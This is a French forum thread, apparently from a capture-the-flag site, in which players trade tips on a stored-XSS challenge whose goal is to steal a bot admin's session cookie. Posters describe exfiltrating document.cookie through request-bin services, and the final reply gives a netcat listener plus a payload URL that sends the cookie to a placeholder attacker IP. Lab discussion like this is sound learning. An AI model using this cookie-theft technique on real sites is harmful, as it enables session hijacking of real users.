Web - Client

Bonjour à tous,
Voilà je galère depuis ce matin sur le challenge XSS et je crois que je vais pas tarder à tout cramer, d’autant plus que j’ai lu tous les posts du forum le concernant et je n’ai rien trouvé pour avancer.
Je vais essayer de retracer tout ce que j’ai fait sans trop spoiler et en laissant quelques indices pour ceux qui voudront résoudre ce challenge.

D’abord j’ai constaté qu’il était aisé d’injecter du html ou du js dans le site sans trop de difficultés.
Je me suis donc dit qu’il serait facile de récupérer le cookie de l’admin en injectant un script allant chercher les cookies dont celui de l’admin lorsqu’il consulterait les messages et ajoutant ce dernier en tant que message.

/ !\ A modérer ? / !\
Malheureusement les messages sont effacés après avoir été lu par l’admin du coup j’ai beaucoup lu sur le forum que certains utilisaient requestbin... c’est très bien ! Du coup zouh, j’injecte la XHR qui envoie la requête vers mon url requestbin !
/ !-------------------/ !\
Très bien ... mais ça passe pas ... via l’interface Inspect de mon requestbin je vois que je n’ai aucune connexion ... Alors peut-être que je me trompe dans l’url ou qu’il faut que je rajoute des paramètres à ma requête mais je ne vois pas trop quoi ...
Du coup, si vous avez des pistes à me filer, je suis preneur !
Merci d’avance ! =)

Pareil pour moi !

1. document.cookie est vide
2. aucune connexion n’apparaît sur ’requestb.in’ quand les messages sont purgés... Je vois bien mes connexions avec le cookie vide mais rien pour l’admin...

Salut rmangin,
Si jamais tu trouves, je veux bien que tu me guides stp ! =)

Salut,

J’ai également été bloqué pendant plusieurs heures sur ce challenge.
Sache que le bot ne suit que les requêtes vers un port 80. Donc du coup les requêtes vers serveurs https ne sont pas gérées.
Et RequestBin est en https maintenant, et il redirige toutes les requêtes http vers son protocol sécurisé.

Pour cette raison je te conseille d’utiliser mockbin plutôt, ça t’aidera sûrement 😉

Bon courage !

Salut,

Apparemment le bot ne suit que les requêtes sur port 80. Donc le protocol https n’est pas géré et tu ne verras pas les accès du bot sur requestbin.
Je te conseille d’utiliser mockbin plutôt.

Bon courage !

iop o/

En faite il s’avère que requestb.in a blacklist root-me.org, tu peux donc utiliser hookbin :)

Bonne chance 🙂

Salut à tous,

J’ai bien compris comment il fallait procéder pour obtenir le cookie de session mais je rencontre un petit problème :
j’utilise actuellement mockbin pour observer les requêtes HTTP et dans les logs je vois des requêtes en provenance de mon IP (ce qui est normal) mais le problème c’est que je n’ai aucune requête en provenance du "bot admin" qui est censé lui aussi subir l’attaque. (le script est bien stocké sur le forum des messages)

est-ce que quelqu’un rencontre le même problème ? suis-je toujours sur la bonne piste ?

En vous remerciant

Il doit y avoir un problème, j’utilise requestbin et j’ai le meme souci :
je vois mon cookie (suite à ma requete) mais jamais celui de l’admin....

Quelqu’un peut-il nous aider svp ?

EDIT : c bon j’ai trouvé en faisant un montant un petit serveur web local avec Python (cela ne fonctionne donc pas avec requestbin sur le 443)

Je n’arrive pas à trouver de site qui fonctionne et qui ne soit pas en HTTPS pour les bin request quelqu’un a un conseil svp ?

pas besoin de serveur extérieur tu peux aussi faire tourner un serveur web en local (pensez a vérifier les redirections de ports TCP au niveau de la box)

et encore plus simple que le serveur web, c’est netcat en mode écoute sur un port
exemple dans un terminal

$ netcat -lp 8080

et dans le payload XSS http://XXX.XXX.XXX.X:8080/?cookie=document.cookie (on remplace les X par ton IP)

et quand le bot se connectera on verra la requête complète avec le cookie

bien sur si le bot ne se connecte que sur le port 80 on met le port 80 dans netcat mais dans ce cas on doit le faire en admin (donc sudo netcat -lp 80)

Merci👍